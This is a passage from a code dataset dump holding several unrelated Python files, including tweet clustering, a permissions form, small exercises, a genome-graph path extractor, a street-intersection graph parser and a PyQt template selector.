self.read_batch_num\n interval, twnum_thres = 5, 4\n if not (rbn >= hbn and (rbn - hbn) % interval == 0):\n return\n print('new list generated, hbn={}, rbn={}'.format(hbn, rbn))\n cluid_twarr_list = self.gsdpmm.get_cluid_twarr_list(twnum_thres)\n if cluid_twarr_list:\n out_channel.put(cluid_twarr_list)\n\n\nif __name__ == '__main__':\n import utils.tweet_keys as tk\n import utils.array_utils as au\n import utils.pattern_utils as pu\n import utils.timer_utils as tmu\n import calling.back_extractor as bext\n import utils.file_iterator as fi\n import utils.function_utils as fu\n fi.mkdir('/home/nfs/cdong/tw/src/calling/tmp', remove_previous=True)\n \n tmu.check_time()\n _hold_batch_num = 100\n _batch_size = 100\n _alpha, _beta = 30, 0.01\n # _alpha, _beta = 50, 0.005\n _file = \"./filtered_twarr.json\"\n _twarr = fu.load_array(_file)[:10200]\n start_pool(_hold_batch_num, _batch_size, _alpha, _beta)\n input_twarr_batch(_twarr)\n \n print('---> waiting for _cluid_cluster_list')\n while True:\n _cluid_cluster_list = cluster_daemon.outq2.get()\n print(' - some thing returned, type :{}'.format(type(_cluid_cluster_list)))\n if _cluid_cluster_list is not None:\n break\n print('---> get _cluid_cluster_list, len:{}'.format(len(_cluid_cluster_list)))\n \n _ext_pool_size = 10\n bext.start_pool(_ext_pool_size)\n bext.input_cluid_twarr_list(_cluid_cluster_list)\n print('waiting for cic outputs')\n _cic_list = bext.get_batch_output()\n print('get cic outputs, type:{}'.format(type(_cic_list)))\n for cic in _cic_list:\n twnum = len(cic.twarr)\n _geo_list = [geo['address'] for geo in cic.od['geo_infer'] if geo['quality'] == 'locality']\n print('cluid:{}, twarr len:{}'.format(cic.cluid, twnum))\n print(cic.od['summary']['keywords'])\n print(_geo_list)\n print('\\n')\n \n if len(_geo_list) == 0:\n _top_geo = 'NOGPE'\n else:\n _top_geo = '`'.join(_geo_list)\n _out_file = '/home/nfs/cdong/tw/src/calling/tmp/id{}_tw{}_{}.txt'.format(cic.cluid, twnum, _top_geo)\n _txtarr = [tw[tk.key_text] for tw in cic.twarr]\n _idx_g, _txt_g = au.group_similar_items(_txtarr, score_thres=0.3, process_num=20)\n _txt_g = [sorted(g, key=lambda t: len(t), reverse=True) for g in _txt_g]\n _txtarr = au.merge_array(_txt_g)\n fu.write_lines(_out_file, _txtarr)\n \n tmu.check_time()\n","sub_path":"calling/back_cluster.py","file_name":"back_cluster.py","file_ext":"py","file_size_in_byte":6139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"429763142","text":"from wtforms.validators import Required\nfrom wtforms.fields import BooleanField, FormField\n\nfrom .forms import BaseForm\nfrom .member import NewForm as BaseNewMemberForm\nfrom atst.domain.permission_sets import PermissionSets\nfrom atst.forms.fields import SelectField\nfrom atst.utils.localization import translate\n\n\nclass PermissionsForm(BaseForm):\n perms_app_mgmt = BooleanField(\n translate(\"forms.new_member.app_mgmt.label\"),\n default=False,\n description=translate(\"forms.new_member.app_mgmt.description\"),\n )\n perms_funding = BooleanField(\n translate(\"forms.new_member.funding.label\"),\n default=False,\n description=translate(\"forms.new_member.funding.description\"),\n )\n perms_reporting = BooleanField(\n translate(\"forms.new_member.reporting.label\"),\n default=False,\n description=translate(\"forms.new_member.reporting.description\"),\n )\n perms_portfolio_mgmt = BooleanField(\n translate(\"forms.new_member.portfolio_mgmt.label\"),\n default=False,\n description=translate(\"forms.new_member.portfolio_mgmt.description\"),\n )\n\n @property\n def data(self):\n _data = super().data\n _data.pop(\"csrf_token\", None)\n perm_sets = []\n\n if _data[\"perms_app_mgmt\"]:\n perm_sets.append(PermissionSets.EDIT_PORTFOLIO_APPLICATION_MANAGEMENT)\n\n if _data[\"perms_funding\"]:\n perm_sets.append(PermissionSets.EDIT_PORTFOLIO_FUNDING)\n\n if _data[\"perms_reporting\"]:\n perm_sets.append(PermissionSets.EDIT_PORTFOLIO_REPORTS)\n\n if _data[\"perms_portfolio_mgmt\"]:\n perm_sets.append(PermissionSets.EDIT_PORTFOLIO_ADMIN)\n\n _data[\"permission_sets\"] = perm_sets\n return _data\n\n\nclass NewForm(PermissionsForm):\n user_data = FormField(BaseNewMemberForm)\n\n\nclass AssignPPOCForm(PermissionsForm):\n role_id = SelectField(\n label=translate(\"forms.assign_ppoc.dod_id\"),\n validators=[Required()],\n choices=[(\"\", \"- Select -\")],\n )\n","sub_path":"atst/forms/portfolio_member.py","file_name":"portfolio_member.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"329634850","text":"\nimport copy\ndef multiplier1 ( m= 1, source = [ 1, 2, 3]) :\n result = copy.copy(source)\n for i, x in enumerate(source) :\n result[i] = result[i] * m\n return result\n\n\ndef multiplier ( m= 1, source = [ 1, 2, 3]) :\n result = list(source)\n for i, x in enumerate(source) :\n result[i] = result[i] * m\n\n return result\n\na = [10, 10, 20, 50]\nprint(multiplier(5))\nprint(multiplier(12, [1, 2]))\nprint(multiplier(3, a))\nprint(a)\n","sub_path":"Practice/o.dagestanski/H_work6/Hw6_task2.py","file_name":"Hw6_task2.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"520327720","text":"#!/bin/python3\r\n\r\nimport math\r\nimport os\r\nimport random\r\nimport re\r\nimport sys\r\n\r\n# Complete the plusMinus function below.\r\ndef plusMinus(arr):\r\n count_p=0\r\n count_n=0\r\n count_zero=0\r\n for i in arr:\r\n if i>0:\r\n count_p+=1\r\n elif i==0:\r\n count_zero+=1\r\n else:\r\n count_n+=1\r\n ratio_p=round(count_p/len(arr),6)\r\n ratio_n=round(count_n/len(arr),6)\r\n ratio_zero=round(count_zero/len(arr),6)\r\n print(ratio_p)\r\n print(ratio_n)\r\n print(ratio_zero)\r\n\r\nif __name__ == '__main__':\r\n n = int(input())\r\n\r\n arr = list(map(int, input().rstrip().split()))\r\n\r\n plusMinus(arr)\r\n","sub_path":"Problem Solving/Algorithms/Plus Minus.py","file_name":"Plus Minus.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"309939493","text":"import sys\r\nimport argparse\r\nimport networkx as nx\r\nfrom collections import defaultdict\r\nfrom Graph import Graph, Node\r\n\r\n'''\r\nUsage: python this.py GFA regionLength(bp)\r\n'''\r\n\r\ndef readGFA(gfaFile):\r\n gfa = open(gfaFile).read().split('\\n')[:-1]\r\n \r\n nodesSeq = dict()\r\n edges = list()\r\n for line in gfa:\r\n if line[0] == 'S':\r\n fields = line.split('\\t')\r\n nodesSeq[fields[1]] = fields[2]\r\n elif line[0] == 'L':\r\n fields = line.split('\\t')\r\n node1 = fields[1]\r\n node1dir = fields[2]\r\n node2 = fields[3]\r\n node2dir = fields[4]\r\n ovlp = int(fields[5][:-1])\r\n node1len = int(fields[6])\r\n node2len = int(fields[7])\r\n edges.append((node1, node1dir, node2, node2dir, ovlp, node1len, node2len))\r\n\r\n G = Graph()\r\n nxg = nx.Graph()\r\n for node1, node1dir, node2, node2dir, ovlp, node1len, node2len in edges:\r\n if node1 not in G.nodemap:\r\n n1_seq = nodesSeq[node1]\r\n assert(len(n1_seq) == node1len)\r\n n1 = Node(node1, node1len, n1_seq)\r\n else:\r\n n1 = G.nodemap[node1]\r\n if node2 not in G.nodemap:\r\n n2_seq = nodesSeq[node2]\r\n assert(len(n2_seq) == node2len)\r\n n2 = Node(node2, node1len, n2_seq)\r\n else:\r\n n2 = G.nodemap[node2]\r\n G.addEdge(n1, node1dir, n2, node2dir, ovlp)\r\n nxg.add_node(node1)\r\n nxg.add_node(node2)\r\n nxg.add_edge(node1, node2)\r\n return G, nxg\r\n\r\ndef get_connected_components(graph):\r\n connected_components = []\r\n nodes = list(graph.nodes())\r\n\r\n while len(nodes)!=0:\r\n start_node = nodes.pop()\r\n queue = [start_node] #FIFO\r\n visited = [start_node]\r\n while len(queue)!=0:\r\n start = queue[0]\r\n queue.remove(start)\r\n neighbours = list(graph.neighbors(start))\r\n #print(neighbours)\r\n for neighbour in neighbours:\r\n if neighbour not in visited:\r\n queue.append(neighbour)\r\n visited.append(neighbour)\r\n nodes.remove(neighbour)\r\n connected_components.append(visited)\r\n \r\n return connected_components\r\n\r\n\r\ndef divide(graph):\r\n components = get_connected_components(graph)\r\n print('Found', len(components), 'connected components', file=sys.stderr)\r\n return components\r\n\r\n\r\ndef main():\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('gfa', type = str, help = 'Input GFA graph file.')\r\n args = parser.parse_args()\r\n\r\n G, nxg = readGFA(args.gfa)\r\n #components = divide(nxg) \r\n print(\"Start computing paths..\", file=sys.stderr)\r\n paths = G.getAllPaths()\r\n print(\"Computed %d paths.\" % len(paths), file=sys.stderr)\r\n paths_between_tips = defaultdict(list)\r\n for path in paths:\r\n first_node = path[0][0]\r\n last_node = path[-1][0]\r\n if first_node < last_node:\r\n paths_between_tips[(first_node, last_node)].append(path)\r\n else:\r\n paths_between_tips[(last_node, first_node)].append(path)\r\n\r\n hap_count = 0\r\n for (tip1, tip2), paths in paths_between_tips.items():\r\n paths_with_lengths = sorted([(G.getPathSeqLength(path), path) for path in paths], key=lambda entry: entry[0])\r\n print('Found %d paths between %s and %s, longest sequence length %d' % (len(paths_with_lengths), tip1, tip2, paths_with_lengths[-1][0]), file=sys.stderr)\r\n longest_path = paths_with_lengths[-1][1]\r\n hap_count += 1\r\n input_file_name_prefix = \"_\".join(args.gfa.split(\"/\")[-1].split(\".\")[:-1])\r\n print('>%s_hap%d' % (input_file_name_prefix, hap_count))\r\n print(G.getPathSeq(longest_path))\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"paftest/GFAextract_sequence.py","file_name":"GFAextract_sequence.py","file_ext":"py","file_size_in_byte":3838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"219046445","text":"import sys\nimport re\nimport hashlib\n# YOUR CODE GOES HERE\nclass Line(object):\n def __init__ (self, src, dst):\n self.src = src\n self.dst = dst\n\n def __str__(self):\n return '<' +str(self.src.index) + ',' + str(self.dst.index) + '>' \n\nclass Point(object):\n def __init__ (self, x, y,name):\n self.x = float(x)\n self.y = float(y)\n self.name = str(name)\n self.index = hashlib.sha1('(' + str(pp(self.x)) + ',' + str(pp(self.y))+ ')'.encode(\"UTF-8\")).hexdigest()[:4]\n def __str__ (self):\n return str(self.index)+': '+'(' + str(pp(self.x)) + ',' + str(pp(self.y))+ ')'\ndef pp(x):\n \"\"\"Returns a pretty-print string representation of a number.\n A float number is represented by an integer, if it is whole,\n and up to two decimal places if it isn't\n \"\"\"\n if isinstance(x, float):\n if x.is_integer():\n return str(int(x))\n else:\n return \"{0:.2f}\".format(x)\n return str(x)\nclass Distance(object):\n def __init__(self, index, distance):\n self.index = index\n self.distance = distance\n\n @classmethod\n def sort_key(cls, key):\n if key == 'distance':\n return lambda obj: obj.distance\n elif key == 'index':\n return lambda obj: obj.index\n\n\ndef out_of_range(x1, y1, x2, y2, x3, y3, x4, y4, xcoor, ycoor,name,test):\n xbig = first_bigger_second(x1,x2)\n ybig = first_bigger_second(y1,y2)\n xbig2 = first_bigger_second(x3,x4)\n ybig2 = first_bigger_second(y3,y4)\n xsmall = first_smaller_second(x1,x2)\n ysmall = first_smaller_second(y1,y2)\n xsmall2 = first_smaller_second(x3,x4)\n ysmall2 = first_smaller_second(y3,y4)\n\n if (xcoor>xbig) or (xcoorxbig2) or (xcoorybig) or (ycoorybig2) or (ycoor= second):\n return first;\n if (first < second):\n return second\n\ndef first_smaller_second ( first, second):\n if (first >= second):\n return second;\n if (first < second):\n return first\n\ndef cross_product(p1, p2, p3): \n x1 = p3.x - p1.x;\n y1 = p3.y - p1.y;\n\n x2 = p2.x - p1.x;\n y2 = p2.y - p1.y;\n cross = x1 * y2 - y1 * x2;\n\n if cross ==0:\n xbig = first_bigger_second(p1.x,p2.x)\n ybig = first_bigger_second(p1.y,p2.y)\n xsmall = first_smaller_second(p1.x,p2.x)\n ysmall = first_smaller_second(p1.y,p2.y)\n if (p3.x>xbig) or (p3.xybig) or (p3.yAdd c->Change r->Remove g->Graph\n# parser state 9 Represents that an \n# appropiate command has been recieved\n# parameter: String input\n#########################################\n###########PARSER STATE MACHINE###########\ndef Parser(line):\n parser_state=0\n test_points=[]\n name=\"\"\n sign_flag=0\n number_flag=0\n space_flag=0\n pointx=\"\"\n pointy=\"\"\n command=0\n point_list=[]\n for len_input in range(0,len(line),1): \n#########State 0#########\n if parser_state==0:\n x=line[len_input]\n if x ==\" \":\n pass\n elif x.isalpha():\n if x==\"a\" or x==\"c\":\n command=x \n parser_state = 1 #Go Next\n elif x==\"r\":\n command=x\n parser_state = 11 #Go Next\n elif x==\"g\":\n command=x \n if len_input==len(line)-2:\n parser_state = 9 #Go Next\n else:\n parser_state = 14 #Go Next \n else:\n sys.stderr.write( \"Error: Command not recognized.\\n\" )\n break \n\n else:\n sys.stderr.write( \"Error: Command not recognized.\\n\" )\n break \n########ADD/CHANGE COMMAND########\n###State 1###\n elif parser_state==1:\n if line[len_input]==\" \":\n parser_state = 2 #Go Next \n else:\n if len_input==len(line)-1:\n sys.stderr.write( \"Error: Missing required arguments.\\n\" )\n else:\n sys.stderr.write( \"Error: Add a space between command and arguments.\\n\" )\n break\n###State 2###\n elif parser_state==2:\n if line[len_input]==\" \":\n pass\n elif line[len_input]=='\"':\n parser_state = 3 #Go Next\n name=\"\"\n else:\n sys.stderr.write( \"Error: needed name argument use format: 'Street Name'.\\n\" )\n break\n###State 3###\n elif parser_state==3:\n x=line[len_input]\n if x.isalpha():\n name+=line[len_input]\n elif x.isdigit():\n sys.stderr.write( \"Error: Do not enter numbers or special characters in Street Name.\\n\" )\n break\n elif line[len_input]!='\"' and line[len_input]!=' ':\n sys.stderr.write( \"Error: wrong command format.\\n\" )\n break\n elif line[len_input]=='\"':\n if len(name)>=1:\n parser_state = 4 #Go Next\n else:\n sys.stderr.write( \"Error: Name not found.\\n\" )\n break\n elif line[len_input]==\" \":\n name+=line[len_input] \n else:\n sys.stderr.write( \"Error: Do not enter numbers or special characters in Street Name.\\n\" )\n break\n###State 4###\n elif parser_state==4:\n \n if line[len_input]==\" \":\n parser_state = 5 #Go Next \n else:\n if len_input==len(line)-1:\n sys.stderr.write( \"Error: Missing required arguments.\\n\" )\n else:\n sys.stderr.write(\"Error: Space nedded between 'Name'argument and coordinates (x,y).\\n\" )\n break\n###State 5###\n elif parser_state==5:\n if line[len_input]==\" \":\n pass\n elif line[len_input]==\"(\":\n parser_state=6 #Go Next\n else:\n sys.stderr.write( \"Error: needed coordinates (x,y).\\n\" )\n break\n###State 6###\n\n elif parser_state==6:\n if line[len_input]==\" \":\n if number_flag==1 or sign_flag==1:\n space_flag=1\n else:\n pass\n elif line[len_input]==\"-\":\n if sign_flag==0 and space_flag==0:\n pointx+=line[len_input]\n sign_flag=1\n else:\n sys.stderr.write( \"Error: wrong coordinate format.\\n\" )\n break\n elif line[len_input].isdigit():\n if space_flag==0:\n pointx+=line[len_input] \n number_flag=1\n sign_flag=1\n else:\n sys.stderr.write( \"Error: wrong coordinate format.\\n\" )\n break\n elif line[len_input]==\",\":\n if(number_flag==1):\n parser_state = 7 #Go Next \n sign_flag=0\n space_flag=0\n number_flag=0\n else:\n sys.stderr.write( \"Error: wrong coordinate format.\\n\" )\n break\n else:\n sys.stderr.write( \"Error: wrong coordinate format.\\n\" )\n break\n###State 7###\n elif parser_state==7:\n if line[len_input]==\" \":\n if number_flag==1 or sign_flag==1:\n space_flag=1\n else:\n pass\n elif len_input==len(line)-2:\n if line[len_input]==\")\":\n if(number_flag==1):\n test_points.append('('+str(pointx)+','+str(pointy)+')')\n pointx=\"\"\n pointy=\"\"\n sign_flag=0\n space_flag=0\n number_flag=0\n parser_state = 9 #Go Next\n else:\n sys.stderr.write( \"Error: wrong coordinate format.\\n\" )\n break \n else:\n sys.stderr.write( \"Error: wrong coordinate format.\\n\" )\n break\n else:\n if line[len_input]==\"-\":\n if sign_flag==0:\n pointy+=line[len_input]\n sign_flag=1\n else:\n sys.stderr.write( \"Error: wrong coordinate format.\\n\" )\n break\n elif line[len_input].isdigit():\n if space_flag==0:\n pointy+=line[len_input] \n number_flag=1\n sign_flag=1\n else:\n sys.stderr.write( \"Error: wrong coordinate format.\\n'\" )\n break\n elif line[len_input]==\")\":\n if(number_flag==1):\n parser_state = 8 #Go Next \n test_points.append('('+str(pointx)+','+str(pointy)+')')\n pointx=\"\"\n pointy=\"\"\n sign_flag=0\n space_flag=0\n number_flag=0\n else:\n sys.stderr.write( \"Error: wrong coordinate format.\\n\" )\n break\n else:\n sys.stderr.write( \"Error: wrong coordinate format.\\n\" )\n break\n###State 8### \n elif parser_state==8:\n if len_input==len(line)-2:\n if line[len_input]==\" \":\n parser_state = 9 #Go Next \n else:\n sys.stderr.write(\"Error: Wrong coordinate format.\\n\" )\n else:\n if line[len_input]==\" \":\n pass\n elif line[len_input]==\"(\":\n if len_input!=len(line)-1:\n parser_state = 6 #Go Next \n sign_flag=0\n space_flag=0\n number_flag=0\n else: \n sys.stderr.write( \"Error: Wrong coordinate format.\\n\" )\n break\n######ADD/CHANGE COMMAND END######\n##########REMOVE COMMAND##########\n###State 11###\n elif parser_state==11:\n if line[len_input]==\" \":\n parser_state = 12 #Go Next \n else:\n if len_input==len(line)-1:\n sys.stderr.write( \"Error: required 'Name' argument.\\n\" )\n else:\n sys.stderr.write( \"Error: required space separation between command and argument.\\n\" )\n break\n###State 12###\n elif parser_state==12:\n if line[len_input]==\" \":\n pass\n elif line[len_input]=='\"':\n parser_state = 13 #Go Next\n name=\"\"\n else:\n sys.stderr.write( \"Error: required 'Name'argument.\\n\" )\n break\n###State 13###\n elif parser_state==13:\n x=line[len_input]\n if x.isalpha():\n name+=line[len_input]\n elif x.isdigit():\n sys.stderr.write( \"Error: Do not enter numbers or special characters in Street Name.\\n\" )\n break\n elif line[len_input]!='\"' and line[len_input]!=' ':\n sys.stderr.write( \"Error: wrong command format.\\n\" )\n break\n elif line[len_input]=='\"':\n if len_input==len(line)-2:\n if len(name)>=1:\n parser_state = 9 #Go Next\n \n else:\n sys.stderr.write( \"Error: Name not found.\\n\" )\n break\n\n elif len(name)>=1:\n parser_state = 14 #Go Next\n else:\n sys.stderr.write( \"Error: Name not found.\\n\" )\n break\n\n elif line[len_input]==\" \":\n name+=line[len_input] \n else:\n sys.stderr.write( \"Error: Do not enter numbers or special characters in Street Name.\\n\" )\n break\n###State 14### This state is shared between graph and remove command\n elif parser_state==14:\n error_flag=0\n for a in range(len_input,len(line)-1,1):\n if line[a]==\" \":\n pass\n else:\n error_flag=1\n if error_flag==0:\n parser_state = 9 #Go Next \n break\n else:\n if command=='r':\n sys.stderr.write(\"Error: Wrong command format.\\n\" )\n elif command=='g':\n if line[len_input]!=\" \":\n sys.stderr.write( \"Error: Wrong command format.\\n\" )\n else:\n sys.stderr.write(\"Error: Command recieves no arguments.\\n\" )\n else:\n sys.stderr.write( \"Error: Wrong command format.\\n\" )\n break\n########REMOVE COMMAND END########\n#########PARSER STATE MACHINE END#########\n if parser_state==9:\n for i in xrange(0,len(test_points),1):\n points = re.findall(\"[-+]?\\d+[\\.]?\\d*[eE]?[-+]?\\d*\", test_points[i])\n p=Point(points[0],points[1],name)\n point_list.append(p)\n return command,name,point_list\n else:\n return False\n\n##########################################\n# GRAPHING MODULE\n# Computes and prints Edges and vertexes\n# parameter: List of List of Street points\n#########################################\ndef graph_calculator(street_list):\n delete_list=[]\n intercept_list=[]\n point_intercept_list=[]\n street_intercept_list=[]\n intercept_found=False\n point_test=0\n dist_list=[]\n edge_list=[]\n sorted_street_list=[]\n vertex_list=[]\n foud_flag=0\n\n for i in xrange(0,(len(street_list))):\n x= len(street_list[i])-1\n for j in xrange(0,x,1):\n for k in xrange(0,len(street_list)):\n if k!=i:\n for l in xrange(0,(len(street_list[k])-1)):\n line_1=Line(street_list[i][j],street_list[i][j+1])\n line_2=Line(street_list[k][l],street_list[k][l+1])\n point_test= intersect(line_1, line_2)\n if point_test!= False:\n intercept_found=True\n if(len(intercept_list)>0):\n for a in range(0,(len(intercept_list))):\n if (intercept_list[a].x!=point_test.x) or (intercept_list[a].y!=point_test.y):\n intercept_list.append(point_test)\n foud_flag=1\n else:\n intercept_list.append(point_test)\n foud_flag=1\n else:\n p1=cross_product(street_list[i][j],street_list[i][j+1],street_list[k][l])\n if p1!= False:\n intercept_found=True\n intercept_list.append(street_list[k][l])\n foud_flag=1\n point_test=True\n p2=cross_product(street_list[i][j],street_list[i][j+1],street_list[k][l+1])\n if p2!= False:\n intercept_found=True\n street_list[k][l+1].name=\"intersect\"\n intercept_list.append(street_list[k][l+1])\n foud_flag=1\n point_test=True\n\n if foud_flag!= 0:\n ################################################################################# \n #Find index of repeated intersects\n delete_list[:]=[]\n for d in range(0,(len(intercept_list))):\n for c in range(1+d,(len(intercept_list))):\n if (intercept_list[d].x==intercept_list[c].x) and(intercept_list[d].y==intercept_list[c].y):\n if c not in delete_list:\n delete_list.append(c)\n delete_list = sorted(delete_list)\n\n #Delete repeated intersects \n for f in xrange(0,(len(delete_list))):\n de= delete_list[f]-f\n del intercept_list[de] \n\n if(len(intercept_list)>1):\n #Order street values by distance from starting point \n \n dist_list[:]=[]\n for q in range(0,(len(intercept_list))):\n xdif = intercept_list[q].x-street_list[i][j].x\n ydif = intercept_list[q].y-street_list[i][j].y\n new1= ((xdif*xdif)+(ydif*ydif))**(.5)\n dist_list.append(Distance(q,new1))\n dist_list.sort(key=Distance.sort_key('distance'))\n \n point_intercept_list.append( street_list[i][j] )\n for m in range(0,(len(dist_list))):\n x=dist_list[m].index\n point_intercept_list.append(intercept_list[x])\n \n point_intercept_list.append( street_list[i][j+1] )\n\n else:\n point_intercept_list.append( street_list[i][j] ) \n for z in range(0,(len(intercept_list))):\n point_intercept_list.append(intercept_list[z])\n point_intercept_list.append( street_list[i][j+1] )\n\n intercept_list[:]=[]\n point_test=0\n foud_flag=0\n ################################################################################# \n if intercept_found==True:\n street_intercept_list.append(point_intercept_list[:])\n intercept_found=False\n point_intercept_list[:]=[]\n \n#find index of repeated values in the streets and delete them \n for x in range(0,(len(street_intercept_list))):\n delete_list[:]=[]\n for a in range(0,(len(street_intercept_list[x]))):\n for b in range(1+a,(len(street_intercept_list[x]))):\n if (street_intercept_list[x][a].x==street_intercept_list[x][b].x) and(street_intercept_list[x][a].y==street_intercept_list[x][b].y):\n if b not in delete_list:\n delete_list.append(b)\n delete_list = sorted(delete_list)\n for i in xrange(0,(len(delete_list))):\n de= delete_list[i]-i\n del street_intercept_list[x][de]\n\n\n#Generate Edge List from ordered List \n for a in range(0,(len(street_intercept_list))):\n for b in range(0,(len(street_intercept_list[a])-1)):\n if street_intercept_list[a][b].name==street_intercept_list[a][b+1].name:\n if street_intercept_list[a][b].name!=\"intersect\":\n pass ## no intercept not considered edge\n else:\n edge_list.append(Line(street_intercept_list[a][b], street_intercept_list[a][b+1]))\n else:\n edge_list.append(Line(street_intercept_list[a][b], street_intercept_list[a][b+1]))\n\n#Save all Vertexes from edge list before filtering\n for a in range(0,(len(edge_list))):\n vertex_list.append(edge_list[a].src)\n vertex_list.append(edge_list[a].dst)\n\n#Find index of repeated Vertexes\n delete_list[:]=[]\n for a in range(0,(len(vertex_list))):\n for b in range(1+a,(len(vertex_list))):\n if (vertex_list[a].x==vertex_list[b].x) and(vertex_list[a].y==vertex_list[b].y):\n if b not in delete_list:\n delete_list.append(b)\n delete_list = sorted(delete_list)\n\n#Delete repeated Vertexes \n for i in xrange(0,(len(delete_list))):\n de= delete_list[i]-i\n del vertex_list[de]\n \n#Print Graph \n sys.stdout.write( \"V = {\\n\" )\n for i in xrange(0,(len(vertex_list))):\n sys.stdout.write(str(vertex_list[i])+\"\\n\")\n sys.stdout.write(\"}\\n\")\n sys.stdout.write( \"E = {\\n\")\n for i in xrange(0,(len(edge_list))):\n if i==len(edge_list)-1:\n sys.stdout.write(str(edge_list[i])+\"\\n\")\n else:\n sys.stdout.write( str(edge_list[i])+\",\\n\")\n sys.stdout.write(\"}\\n\")\n\ndef main():\n\n point_list=[]\n street_list=[]\n while True:\n line = sys.stdin.readline()\n input_data=Parser(line)\n if input_data!=False:\n\n########Extract Input Data########\n input_data=list(input_data)\n command = input_data[0]\n street_name = input_data[1]\n point_list = input_data[2][:]\n\n########Add Command Interpretation########\n if command=='a':\n\n if len(street_list)>=1:\n name_found=search_street_name(street_list,street_name)\n if name_found==\"False\":\n if len(point_list)>1:\n street_list.append(point_list[:])\n else:\n sys.stderr.write( \"Error: Streets need to contain at least two point coordinates\\n\")\n else:\n sys.stderr.write( \"Error: this street has all ready been registered to change it use the c command\\n\")\n else:\n if len(point_list)>1:\n street_list.append(point_list[:])\n else:\n sys.stderr.write( \"Error: Streets need to contain at least two point coordinates\\n\")\n\n########Change Command Interpretation#####\n elif command=='c':\n if len(street_list)>=1:\n name_found=search_street_name(street_list,street_name)\n if name_found==\"False\":\n sys.stderr.write( \"Error: Street not found\\n\")\n else:\n if len(point_list)>1:\n del street_list[name_found]\n street_list.append(point_list[:])\n else:\n sys.stderr.write( \"Error: Streets need to contain at least two point coordinates\\n\")\n else:\n sys.stderr.write( \"Error: currently there are no added Streets\\n\")\n\n########Remove Command Interpretation#####\n elif command=='r':\n if len(street_list)>=1:\n name_found=search_street_name(street_list,street_name)\n if name_found==\"False\":\n sys.stderr.write( \"Error: Street not found\\n\")\n else:\n del street_list[name_found]\n else:\n sys.stderr.write( \"Error: currently there are no added Streets\\n\")\n pass\n\n########Graph Command Interpretation######\n elif command=='g':\n if len(street_list)>=1:\n graph_calculator(street_list)\n else:\n sys.stderr.write( \"Error: currently there are no added Streets\\n\")\n \n sys.exit(0)\n\nif __name__ == '__main__':\n while True:\n main()","sub_path":"a1ece650.py","file_name":"a1ece650.py","file_ext":"py","file_size_in_byte":21756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"515664755","text":"#!/usr/bin/python3\r\n# -*- coding: utf-8 -*-\r\n\r\nfrom ui_model_select import Ui_Model_Select\r\nfrom PyQt5.QtWidgets import QWidget, QTableWidgetItem, QAbstractItemView,QHeaderView, QMessageBox,QListWidgetItem, QInputDialog\r\nfrom db import Model_DB\r\nfrom PyQt5.QtCore import pyqtSignal\r\n\r\nclass MyModelSelect(QWidget, Ui_Model_Select):\r\n #自定义信号\r\n model_add_ok_signal = pyqtSignal(str)\r\n\r\n def __init__(self, parent=None):\r\n super(MyModelSelect, self).__init__(parent)\r\n self.setupUi(self)\r\n\r\n self.tableWidget_model.setColumnCount(2)\r\n self.tableWidget_model.setHorizontalHeaderLabels(['名称', '类型'])\r\n self.tableWidget_model.setSelectionBehavior(QAbstractItemView.SelectRows)\r\n self.tableWidget_model.setEditTriggers(QAbstractItemView.NoEditTriggers)\r\n self.tableWidget_model.horizontalHeader().setSectionResizeMode(QHeaderView.Stretch)\r\n\r\n self.radioButton_model.setChecked(True)\r\n self.radioButton_model.toggled.connect(self.update_model)\r\n self.pushButton_romove.clicked.connect(self.model_check_remove)\r\n self.pushButton_confirm.clicked.connect(self.check_ok)\r\n\r\n #表格点击信号(点击时显示选择的模板)\r\n self.tableWidget_model.cellDoubleClicked.connect(self.update_check_list)\r\n\r\n self.check_list = []\r\n #创建数据库对象\r\n self.model_db = Model_DB()\r\n self.update_model()\r\n\r\n\r\n\r\n def update_model(self):\r\n #先清空表格\r\n self.tableWidget_model.clearContents()\r\n #清空选中列表\r\n self.listWidget_model_checked.clear()\r\n self.check_list.clear()\r\n\r\n #获取模板数据\r\n model_default_res = self.model_db.select_all(1)\r\n self.model = model_default_res.fetchall()\r\n model_custom_res = self.model_db.select_all(2)\r\n self.model += model_custom_res.fetchall()\r\n\r\n #获取模板组数据\r\n model_list_res = self.model_db.select_all(3)\r\n self.model_list = model_list_res.fetchall()\r\n\r\n if self.radioButton_model.isChecked():\r\n self.tableWidget_model.setRowCount(len(self.model))\r\n row = 0\r\n for item in self.model:\r\n self.tableWidget_model.setItem(row, 0, QTableWidgetItem(item[1]))\r\n type_name = '内置模板'\r\n if item[3] == 2:\r\n type_name = '自定义模板'\r\n\r\n self.tableWidget_model.setItem(row, 1, QTableWidgetItem(type_name))\r\n row += 1\r\n else:\r\n #更新模板组\r\n self.tableWidget_model.setRowCount(len(self.model_list))\r\n row = 0\r\n for item in self.model_list:\r\n self.tableWidget_model.setItem(row, 0, QTableWidgetItem(item[1]))\r\n self.tableWidget_model.setItem(row, 1, QTableWidgetItem('模板组'))\r\n row += 1\r\n\r\n def update_check_list(self, row, col):\r\n '''将模板添加到选中列表'''\r\n\r\n if self.radioButton_model.isChecked():\r\n self.listWidget_model_checked.addItem(self.model[row][1])\r\n self.check_list.append(self.model[row])\r\n else:\r\n if self.check_list:\r\n QMessageBox.about(self, \"错误\", \"模板组只能选择一个\")\r\n return\r\n self.listWidget_model_checked.addItem(self.model_list[row][1])\r\n self.check_list.append(self.model_list[row])\r\n\r\n def model_check_remove(self):\r\n '''从选中列表移除模板'''\r\n\r\n list_item = self.listWidget_model_checked.currentItem()\r\n if not list_item:\r\n QMessageBox.about(self, \"错误\", \"请选择要移除的模板\")\r\n return\r\n\r\n model_name = list_item.text()\r\n self.listWidget_model_checked.takeItem(self.listWidget_model_checked.currentRow())\r\n\r\n for item in self.check_list:\r\n if item[1] == model_name:\r\n self.check_list.remove(item)\r\n break\r\n\r\n def check_ok(self):\r\n 